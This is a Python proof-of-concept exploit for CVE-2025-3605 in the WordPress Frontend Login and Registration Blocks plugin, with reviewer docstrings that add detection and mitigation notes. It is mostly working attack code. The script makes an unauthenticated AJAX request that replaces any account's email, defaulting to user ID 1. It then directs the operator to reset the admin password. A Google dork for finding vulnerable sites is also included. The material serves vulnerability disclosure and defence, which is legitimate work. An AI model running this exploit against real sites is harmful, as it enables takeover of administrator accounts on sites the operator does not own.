# Exploit Title: WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation
# Google Dork: inurl:/wp-content/plugins/frontend-login-and-registration-blocks/
# Date: 2025-05-12
# Exploit Author: Md Shoriful Islam (RootHarpy)
# Vendor Homepage: https://wordpress.org/plugins/frontend-login-and-registration-blocks/
# Software Link: https://downloads.wordpress.org/plugin/frontend-login-and-registration-blocks.1.0.7.zip
# Version: <= 1.0.7
# Tested on: Ubuntu 22.04 + WordPress 6.5.2
# CVE : CVE-2025-3605
"""Proof of concept for CVE-2025-3605 (defensive reading of the script below).

What the script actually does: it sends one POST to ``wp-admin/admin-ajax.php``
with ``action=flrblocksusersettingsupdatehandle``, a caller-chosen ``user_id`` and
a replacement e-mail address. The session it uses carries no WordPress login
cookie, so the request is unauthenticated from the site's point of view; the
plugin handler evidently applies the change anyway, i.e. it does not verify that
the requester is allowed to edit the named account (inferred from the request
shape alone -- confirm against the plugin source). With the account's e-mail
replaced, the ordinary lost-password flow delivers a reset link to the new
address, which is what the success message tells the operator to do next.

Detection / mitigation notes (review):
  * Update the plugin past 1.0.7 -- the header states ``<= 1.0.7`` as affected.
  * Alert on POSTs to admin-ajax.php whose ``action`` is
    ``flrblocksusersettingsupdatehandle`` and that arrive without a logged-in
    cookie, and on e-mail changes to privileged accounts followed shortly by a
    password-reset request.
  * A WAF rule keyed on the action name is only a stopgap; the real fix is an
    ownership/capability check inside the handler.
"""
import requests
import argparse
import sys


def display_banner() -> None:
    """Print the ASCII-art banner (cosmetic only, no effect on the request)."""
    # NOTE(review): the banner's line breaks appear to have been lost in this
    # copy of the file; the text is reproduced exactly as found.
    banner = """ _____ _____ ___ __ ___ ___ ____ __ __ ___ / __\ \ / / __|_|_ ) \_ ) __|__|__ / / / / \| __| | (__ \ V /| _|___/ / () / /|__ \___|_ \/ _ \ () |__ \ \___| \_/ |___| /___\__/___|___/ |___/\___/\__/|___/ """
    print(banner)


def suppress_ssl_warnings() -> None:
    """Silence urllib3's InsecureRequestWarning.

    Needed only because initialize_session() turns certificate verification
    off. ``requests.packages.urllib3`` is a legacy alias that newer requests
    releases may stop exposing; ``urllib3.disable_warnings()`` is the direct call.
    """
    requests.packages.urllib3.disable_warnings()


def initialize_session() -> requests.Session:
    """Return a requests.Session with TLS verification disabled and a browser User-Agent.

    No cookies or credentials are attached, so every request sent through this
    session is anonymous -- that is the whole point of the finding. Note that
    ``verify = False`` also makes the tool itself accept any certificate the
    target presents.
    """
    new_session = requests.Session()
    new_session.verify = False
    new_session.headers.update({'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"})
    return new_session


def parse_input_args() -> argparse.Namespace:
    """Parse command-line options.

    ``--target`` is joined with ``/wp-admin/admin-ajax.php`` by execute_exploit(),
    so it should be the site's base URL without a trailing slash. ``--target_user``
    is passed through as a string, which is what the form field expects.
    """
    parser = argparse.ArgumentParser(description="Exploit for Privilege Escalation in Frontend Login and Registration Plugin <= 1.0.7")
    parser.add_argument("--target", "-t", required=True, help="Target URL to exploit")
    parser.add_argument("--target_user", "-u", default="1", help="User ID for target (default: 1)")
    parser.add_argument("--new_email", "-e", default="example@gmail.com", help="Email to change to (default: example@gmail.com)")
    return parser.parse_args()


def generate_payload(user: str, email: str) -> dict[str, str]:
    """Build the form body for the vulnerable AJAX action.

    The three keys mirror the plugin's own settings form; ``user_id`` is the
    field the handler trusts without checking it against the caller's identity
    (that unchecked field is the vulnerability the PoC demonstrates).
    """
    return {
        'action': 'flrblocksusersettingsupdatehandle',
        'user_id': user,
        'flr-blocks-email-update': email
    }


def execute_exploit(session: requests.Session, target_url: str, payload: dict[str, str]) -> requests.Response:
    """POST ``payload`` to the target's admin-ajax.php and return the response.

    Any exception from the request (connection, TLS, timeout -- note that no
    timeout is set, so a silent target can hang this call) is printed and the
    process exits with status 1; the function never returns None.
    """
    try:
        return session.post(f"{target_url}/wp-admin/admin-ajax.php", data=payload)
    except Exception as error:
        # Broad catch is deliberate for a one-shot CLI: report and stop.
        print(f"Request error: {error}")
        sys.exit(1)


def process_response(response: requests.Response) -> None:
    """Report success or failure based on the HTTP status and body.

    WordPress' admin-ajax.php answers with the bare string ``0`` when no handler
    ran, so anything else with HTTP 200 is treated as success. The body is not
    parsed, so a handler that ran but refused the change would presumably also
    be reported as a success here -- verify the change on the target before
    trusting this message.
    """
    if response.status_code == 200 and response.text.strip() != "0":
        print(f"Exploit succeeded! Response: {response.text}")
        print("Next: Go to the Forgot Password page and reset the admin password using the new email!")
    else:
        print(f"Exploit failed. HTTP Status: {response.status_code}, Response: {response.text}")


def run_exploit() -> None:
    """CLI entry point: banner, argument parsing, one request, result report."""
    display_banner()
    suppress_ssl_warnings()
    args = parse_input_args()
    session = initialize_session()
    payload = generate_payload(args.target_user, args.new_email)
    response = execute_exploit(session, args.target, payload)
    process_response(response)


if __name__ == "__main__":
    run_exploit()